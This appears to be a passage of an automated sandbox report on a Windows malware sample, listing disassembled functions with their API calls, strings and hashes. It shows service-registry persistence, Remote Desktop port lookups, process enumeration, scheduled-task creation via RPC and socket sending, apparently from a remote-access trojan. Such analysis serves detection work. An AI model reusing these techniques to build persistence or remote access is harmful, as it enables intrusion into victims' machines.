lstrlenA.KERNEL32(1004E0B4,00000000), ref: 10007B91

Part of subcall function 1001138A: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 100113B9
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegCreateKeyExA), ref: 100113CB
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegSetValueExA), ref: 100113DD
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegDeleteKeyA), ref: 100113EF
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegDeleteValueA), ref: 10011401
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 10011413
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 10011425

Strings

SYSTEM\CurrentControlSet\Services\%s, xrefs: 10007B76, 10007B79
Groupfenzhu, xrefs: 10007B9F
s\%s, xrefs: 10007B72, 10007B75

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoadlstrlenwsprintf
String ID: Groupfenzhu$SYSTEM\CurrentControlSet\Services\%s$s\%s
API String ID: 2349312171-2858497736
Opcode ID: 1440da30417e3beda673d028c122c2e7aaedd9017cd7c2add6527992a10bcde9
Instruction ID: c621f3e339a8ab9eb751f45c00706f5c21af8ca64c3ff2a9ac5a1c01fca35edd
Opcode Fuzzy Hash: 1440da30417e3beda673d028c122c2e7aaedd9017cd7c2add6527992a10bcde9
Instruction Fuzzy Hash: 0431C410D0C6C9DDFB02C6A8C8087DEBFA55B26749F0840D8D5983A292C7FF175887BA

Function 1000C355 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1000C396

Part of subcall function 10011039: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 100110B4
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 100110CC
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100110E1
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100110F6
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1001110B
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 10011120
Part of subcall function 10011039: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 10011149
Part of subcall function 10011039: FreeLibrary.KERNEL32(00000000), ref: 10011354

lstrlenA.KERNEL32(?), ref: 1000C3CA
lstrlenA.KERNEL32(?), ref: 1000C3DF

Strings

SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s, xrefs: 1000C38A
PortNumber, xrefs: 1000C3AD

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$Librarylstrlen$FreeLoadOpenwsprintf
String ID: PortNumber$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s
API String ID: 489517643-1099511696
Opcode ID: 50d88702444f218c7b1aef9dd5839f235d2def618d8ed783afa0526bd62f9548
Instruction ID: ccd10d43eaa4a560ca189bb9515c68130169b7ba4219cdc41423fd31d4121a70
Opcode Fuzzy Hash: 50d88702444f218c7b1aef9dd5839f235d2def618d8ed783afa0526bd62f9548
Instruction Fuzzy Hash: 8E0152B9600208BBE714DF90DC86FBA3768EB44604F108158FF189E181E771EA158BD5

Function 1000BFF9 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 38stringCOMMON

Download Yara Rule

APIs

Part of subcall function 1000BE89: wsprintfA.USER32 ref: 1000BF78

lstrlenA.KERNEL32(MarkTime), ref: 1000C03F
lstrlenA.KERNEL32(MarkTime), ref: 1000C061

Strings

Time, xrefs: 1000C02F, 1000C032
MarkTime, xrefs: 1000C027, 1000C03B, 1000C05D, 1000C04E, 1000C02A, 1000C03E, 1000C051, 1000C060
MarkTime, xrefs: 1000C02B, 1000C02E

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: lstrlen$wsprintf
String ID: MarkTime$MarkTime$Time
API String ID: 1220175532-4269331374
Opcode ID: 52d489e34bb9a9e78a729bf710ca4f7c9047b97d17eefbfcab1a6480e4de2184
Instruction ID: 11f113f0fd8f669ecbdd5f26a20a1b6d13e595aa33371f09b8b987b030509a32
Opcode Fuzzy Hash: 52d489e34bb9a9e78a729bf710ca4f7c9047b97d17eefbfcab1a6480e4de2184
Instruction Fuzzy Hash: BA017565A042C8FBEF01CBA8C848BDEBBA9AF15248F04C1C8F9585B242D7B69614C771

Function 10001C6F Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,00000001,00000004), ref: 10001C9B
CancelIo.KERNEL32(?), ref: 10001CA8
InterlockedExchange.KERNEL32(?,00000000), ref: 10001CB7
closesocket.WS2_32(?), ref: 10001CC4
SetEvent.KERNEL32(?), ref: 10001CD1

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: 8b29ea016c5437521a6df5b97186e1165119d85faa03a8b8551e038b97722628
Instruction ID: 826515d66e6bed3a352f1263f7ef7fdb54b1f937eddae0c48fca0c3b07aee883
Opcode Fuzzy Hash: 8b29ea016c5437521a6df5b97186e1165119d85faa03a8b8551e038b97722628
Instruction Fuzzy Hash: 8E014F75600308EBD710EF94C889E9DBB75FF48714F204288FA45573A0D731A985CB50

Function 00410DA5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 00410E7F

Strings

HeapAlloc, xrefs: 00410E56, 00410E59
GetProcessHeap, xrefs: 00410E43, 00410E46
kernel32.dll, xrefs: 00410E47, 00410E4A

Memory Dump Source

Source File: 00000007.00000002.3502521914.0000000000410000.00000040.00001000.00020000.00000000.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_lXAMaI.jbxd

Similarity

API ID: AllocateHeap
String ID: GetProcessHeap$HeapAlloc$kernel32.dll
API String ID: 1279760036-3608170434
Opcode ID: 3252604a37a0a8bb126a40a8f6807a8f64c9dcf62a30e9b73859616a923969f1
Instruction ID: 7f7ecdf57b041d027411ac98e2a12aa0b3cb7e12c3b1a16dfe53de112c4f8f05
Opcode Fuzzy Hash: 3252604a37a0a8bb126a40a8f6807a8f64c9dcf62a30e9b73859616a923969f1
Instruction Fuzzy Hash: AD41A161D082CCD9EB02D7E8D4487DEBFB65F26708F084189D5847B282C7BB5658C7BA

Function 035A1140 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 035A10A0: RpcStringBindingComposeW.RPCRT4(035B8850,ncacn_np,localhost,035B889C,00000000,?), ref: 035A10DB
Part of subcall function 035A10A0: RpcBindingFromStringBindingW.RPCRT4(?,?), ref: 035A10E9
Part of subcall function 035A10A0: RpcBindingSetAuthInfoExA.RPCRT4(?,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 035A111D
Part of subcall function 035A10A0: RpcStringFreeW.RPCRT4(?), ref: 035A1127

_swprintf.LIBCMTD ref: 035A11A9

Part of subcall function 035A1060: __vswprintf_s_l.LIBCONCRTD ref: 035A107E

_swprintf.LIBCMTD ref: 035A11DC

Part of subcall function 035A12A0: NdrClientCall2.RPCRT4 ref: 035A12BC

Strings

\%s, xrefs: 035A11CB
<?xml version="1.0" encoding="UTF-16"?><Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Regi, xrefs: 035A1198

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: Binding$String$_swprintf$AuthCall2ClientComposeFreeFromInfo__vswprintf_s_l
String ID: <?xml version="1.0" encoding="UTF-16"?><Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Regi$\%s
API String ID: 2434665183-3516990142
Opcode ID: 793b342deffbc4f77330f8b2cb3d93db5cf7ee738afd4c30dc5bb8c51c516b10
Instruction ID: 6aceae24a7d6d10a9875576b3e4e3d2febbc2d89eb118686ccc52a078120e276
Opcode Fuzzy Hash: 793b342deffbc4f77330f8b2cb3d93db5cf7ee738afd4c30dc5bb8c51c516b10
Instruction Fuzzy Hash: 6F2162F9950748ABDB10EF54EC41FDD73B8BB44700F448894A709AA191EA709B489BA9

Function 03601140 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 036010A0: RpcStringBindingComposeW.RPCRT4(03618850,ncacn_np,localhost,0361889C,00000000,?), ref: 036010DB
Part of subcall function 036010A0: RpcBindingFromStringBindingW.RPCRT4(?,?), ref: 036010E9
Part of subcall function 036010A0: RpcBindingSetAuthInfoExA.RPCRT4(?,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 0360111D
Part of subcall function 036010A0: RpcStringFreeW.RPCRT4(?), ref: 03601127

_swprintf.LIBCMTD ref: 036011A9

Part of subcall function 03601060: __vswprintf_s_l.LIBCONCRTD ref: 0360107E

_swprintf.LIBCMTD ref: 036011DC

Part of subcall function 036012A0: NdrClientCall2.RPCRT4 ref: 036012BC

Strings

<?xml version="1.0" encoding="UTF-16"?><Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Regi, xrefs: 03601198
\%s, xrefs: 036011CB

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: Binding$String$_swprintf$AuthCall2ClientComposeFreeFromInfo__vswprintf_s_l
String ID: <?xml version="1.0" encoding="UTF-16"?><Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Regi$\%s
API String ID: 2434665183-3516990142
Opcode ID: 10a5f29f75e5d2012096e82cfec1c9546b67233e358ec7cfc82dd2d437e13016
Instruction ID: 181f6bf2e854be610b9a2787e9163c17bdc20eb2df98e715fa1bebf012ac9f67
Opcode Fuzzy Hash: 10a5f29f75e5d2012096e82cfec1c9546b67233e358ec7cfc82dd2d437e13016
Instruction Fuzzy Hash: 2A2179F9D50358ABD714DF54DD42F9E73F8AB04700F44C899B709AA1C0DE705A848B9D

Function 100107B2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,1000814B,00000000,00000000,00000000), ref: 100107D3

Part of subcall function 1001365D: CreateThread.KERNEL32(?,100107FA,100136C8,00000000,?,?), ref: 1001369E
Part of subcall function 1001365D: GetLastError.KERNEL32(?,?,?,100107FA,?,?,10010760,?,?,?), ref: 100136A8

WaitForSingleObject.KERNEL32(?,000000FF), ref: 10010806
CloseHandle.KERNEL32(?), ref: 10010810

Strings

Pc., xrefs: 100107F4

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Create$CloseErrorEventHandleLastObjectSingleThreadWait
String ID: Pc.
API String ID: 3117531959-224001918
Opcode ID: 5a375833b62df99c4f62a9df4e570202cec7947a2b2271969219265408dde481
Instruction ID: 85b2bd2e31a1e102ff51c16e8c7586042af0a6b273ea039921b8efdb3ad0cf39
Opcode Fuzzy Hash: 5a375833b62df99c4f62a9df4e570202cec7947a2b2271969219265408dde481
Instruction Fuzzy Hash: 7B01ECB5A00209EBDB10DF98CD85F9E77B5FB48710F208249F915A73D0D770AA518BA1

Function 100258DC Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,?,?,100258D7), ref: 10025953
GetProcessVersion.KERNEL32(00000000,?,?,?,100258D7), ref: 10025990
LoadCursorA.USER32(00000000,00007F02), ref: 100259BE
LoadCursorA.USER32(00000000,00007F00), ref: 100259C9

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CursorLoadVersion$Process
String ID:
API String ID: 2246821583-0
Opcode ID: d43b9c830b6949b457dd21c12c7295e916faf1ae1c536fbd339f6bbab6cd96bc
Instruction ID: 0346a21f44e901a7145a47f18b998023b34eec0e45f1407343cd45373e4815d5
Opcode Fuzzy Hash: d43b9c830b6949b457dd21c12c7295e916faf1ae1c536fbd339f6bbab6cd96bc
Instruction Fuzzy Hash: F4116AB1A00B608FD724DF3E988451ABBE5FB486157510D3EE18BC6B80DB78A4418B50

Function 10010868 Relevance: 6.1, APIs: 4, Instructions: 62processstringCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10010879
Process32First.KERNEL32(1000C43D,?), ref: 100108A8
Process32Next.KERNEL32(1000C43D,?), ref: 100108DE
lstrcmpiA.KERNEL32(?,1000C43D), ref: 100108F2

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Process32$CreateFirstNextSnapshotToolhelp32lstrcmpi
String ID:
API String ID: 2530627638-0
Opcode ID: b999ae9db35fcc2ee622cae5e986b77dc7f4ea3e84d0adbfcc6b956d65bfd5a1
Instruction ID: cd615b51e4b14e1d3e1323d22a5c5ab46e0f79664c9bde7e0e8397b341281295
Opcode Fuzzy Hash: b999ae9db35fcc2ee622cae5e986b77dc7f4ea3e84d0adbfcc6b956d65bfd5a1
Instruction Fuzzy Hash: 0A21BAB8E0420CEBDB04DB98C991A9EB7F9EF48344F108198F954AB345D774EE90DB94

Function 10008E2E Relevance: 6.0, APIs: 4, Instructions: 49processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10008E45
Process32First.KERNEL32(?,00000128), ref: 10008E62
Process32Next.KERNEL32(?,00000128), ref: 10008E8D
CloseHandle.KERNEL32(?,00000002,00000000), ref: 10008EC3

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 44b8118ccc7dcee7430153dbf39f955e77ad71f0a1e94ba76642d9b7e1234b8d
Instruction ID: 44dd589efa43ab8005649ff4f60f11f0bb47c447ee6eaab2459f7a9ba73c1aa7
Opcode Fuzzy Hash: 44b8118ccc7dcee7430153dbf39f955e77ad71f0a1e94ba76642d9b7e1234b8d
Instruction Fuzzy Hash: 8D1184799002589BEB20DB60CD41BCEB3F9FB48380F1040D5E94896244EB30EF908F90

Function 10001490 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 10001513
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10001521

Strings

hx , xrefs: 1000155E, 10001564

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CreateEventStartup
String ID: hx
API String ID: 1546077022-1695387836
Opcode ID: 9f426da6733f44622ac9f5e79722b507c16be30c43235b3d08a16408967aafb4
Instruction ID: 3def6207765306e6fa864bbc32aa91b602f5ce1abb46488a20a835e5482c1d6f
Opcode Fuzzy Hash: 9f426da6733f44622ac9f5e79722b507c16be30c43235b3d08a16408967aafb4
Instruction Fuzzy Hash: 5A218E30A01298DFEB21DB58CD55BD8BBB0EF46304F0402C8E18A6B3C2C7B56A84CF52

Function 1000BE32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 10011039: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 100110B4
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 100110CC
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100110E1
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100110F6
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1001110B
Part of subcall function 10011039: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 10011120
Part of subcall function 10011039: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 10011149
Part of subcall function 10011039: FreeLibrary.KERNEL32(00000000), ref: 10011354

lstrlenA.KERNEL32(00000032,?,?,?,?,?,?,?,?,?,00000032,?), ref: 1000BE6F
gethostname.WS2_32(00000032,?), ref: 1000BE81

Strings

Remarkbeizhu, xrefs: 1000BE55

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadOpengethostnamelstrlen
String ID: Remarkbeizhu
API String ID: 1814320217-71224108
Opcode ID: 1aa18a5a566c7bfe29c7c2e6ea0c830dd08ccd1b8e3ff8fd8d38c7d59ccf8d2e
Instruction ID: 1f5c122398fdd3b398e565859474cadd78e1ea07d6906f3fa7be4e643ff5ab00
Opcode Fuzzy Hash: 1aa18a5a566c7bfe29c7c2e6ea0c830dd08ccd1b8e3ff8fd8d38c7d59ccf8d2e
Instruction Fuzzy Hash: 9DF0DABA610248BBEB14DF94DC95FEB376DEB48740F108108FA1D8F281D671E9508BE1

Function 10001EC7 Relevance: 4.6, APIs: 3, Instructions: 102networksleepCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,0000000F,00000000), ref: 10001F46
Sleep.KERNEL32(0000000A,?,?,00000000,00000000), ref: 10001F7D
send.WS2_32(?,?,00000000,00000000), ref: 10001FB6

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: send$Sleep
String ID:
API String ID: 3329562092-0
Opcode ID: b3df9141c293645e7a0c5266e4bf01bb92806ea4dd0008a8747ba9bace45321f
Instruction ID: 99193fa7917589cb6bcc31a91eeb6dc8092ae46e5c633fbf2c65dbe52e00a7d6
Opcode Fuzzy Hash: b3df9141c293645e7a0c5266e4bf01bb92806ea4dd0008a8747ba9bace45321f
Instruction Fuzzy Hash: B941D674E0020ADFDB04DF94C580BEEBBB6FF44354F208559E914A7284C374AA41DF91

Function 1000122F Relevance: 4.6, APIs: 3, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

__ftol.LIBCMT ref: 10001270
VirtualAlloc.KERNEL32(00000000,00000003,00001000,00000004,?,?,?,?,10001E30), ref: 10001288

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AllocVirtual__ftol
String ID:
API String ID: 2936333547-0
Opcode ID: 1374640a967e08f6e07d80639937ab6bc54f00934d668e72b1f61354821b3a23
Instruction ID: c0e341edb867b944fd2e8199d08c2e3b5db7c5f6d0607c5ff7fcc07e2b85333c
Opcode Fuzzy Hash: 1374640a967e08f6e07d80639937ab6bc54f00934d668e72b1f61354821b3a23
Instruction Fuzzy Hash: 2D314B78E00219EFDB04DFA4C885BAEFBB1FF48340F1085A9E914AB385D730A951CB91

Function 1000C3E9 Relevance: 4.6, APIs: 3, Instructions: 54stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(100548C8,1004FB1C), ref: 1000C499

Part of subcall function 10010868: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10010879
Part of subcall function 10010868: Process32First.KERNEL32(1000C43D,?), ref: 100108A8

lstrcatA.KERNEL32(100548C8,00000000), ref: 1000C454
lstrcatA.KERNEL32(100548C8,1004FB14), ref: 1000C464

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
